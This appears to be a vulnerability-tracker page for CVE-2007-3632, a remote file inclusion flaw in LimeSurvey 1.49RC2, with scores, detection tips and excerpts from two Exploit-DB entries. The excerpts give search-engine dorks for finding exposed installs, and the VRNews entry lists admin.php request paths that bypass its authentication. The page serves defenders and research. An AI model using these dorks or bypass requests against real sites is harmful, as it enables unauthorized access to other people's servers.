CVE-2007-3632
published 2007-07-10CVE-2007-3632: Multiple PHP remote file inclusion vulnerabilities in LimeSurvey (aka PHPSurveyor) 1.49RC2 allow remote attackers to execute arbitrary PHP code via a URL in…
PriorityP353medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
61.51%
99.1th percentile
Multiple PHP remote file inclusion vulnerabilities in LimeSurvey (aka PHPSurveyor) 1.49RC2 allow remote attackers to execute arbitrary PHP code via a URL in the homedir parameter to (1) OLE/PPS/File.php, (2) OLE/PPS/Root.php, (3) Spreadsheet/Excel/Writer.php, or (4) OLE/PPS.php in admin/classes/pear/; or (5) Worksheet.php, (6) Parser.php, (7) Workbook.php, (8) Format.php, or (9) BIFFwriter.php in admin/classes/pear/Spreadsheet/Excel/Writer/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| limesurvey | limesurvey | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect RFI exploitation attempts by monitoring HTTP requests to the vulnerable PHP files containing a URL-like value in the 'homedir' GET parameter ↗
- →Use the Google dork to identify exposed LimeSurvey 1.49RC2 instances that may be targeted ↗
- →All nine vulnerable files share the same attack vector: the 'homedir' parameter is used for remote file inclusion across admin/classes/pear/ subdirectories ↗
- ·Vulnerability only affects LimeSurvey (PHPSurveyor) version 1.49RC2 specifically; other versions are not confirmed affected by this CVE ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion
exploitdb·2007-07-06
CVE-2007-3632 LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion
LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion
---
## Owner : Pr0T3cT10n
## Email : [email protected]
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"
## Bug :
## Files :
## /admin/classes/pear/OLE/PPS/File.php
## /admin/classes/pear/OLE/PPS/Root.php
## /admin/classes/pear/Spreadsheet/Excel/Writer.php
## /admin/classes/pear/OLE/PPS.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
## /adm
Exploit-DB
VRNews 1.1.1 - 'admin.php' Remote Security Bypass
exploitdb·2007-07-05
CVE-2007-3611 VRNews 1.1.1 - 'admin.php' Remote Security Bypass
VRNews 1.1.1 - 'admin.php' Remote Security Bypass
---
VRNews v1.x <= /VRNews/admin.php Permission
Found by: R4M! - [email protected]
Dork: intitle:"vrnews v1"
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del
# milw0rm.com [2007-07-05]
No writeups or analysis indexed.
http://osvdb.org/45791http://osvdb.org/45792http://osvdb.org/45793http://osvdb.org/45794http://osvdb.org/45795http://osvdb.org/45796http://osvdb.org/45797http://osvdb.org/45798http://osvdb.org/45799http://www.vupen.com/english/advisories/2007/2459https://exchange.xforce.ibmcloud.com/vulnerabilities/35284https://www.exploit-db.com/exploits/4156http://osvdb.org/45791http://osvdb.org/45792http://osvdb.org/45793http://osvdb.org/45794http://osvdb.org/45795http://osvdb.org/45796http://osvdb.org/45797http://osvdb.org/45798http://osvdb.org/45799http://www.vupen.com/english/advisories/2007/2459https://exchange.xforce.ibmcloud.com/vulnerabilities/35284https://www.exploit-db.com/exploits/4156
2007-07-10
Published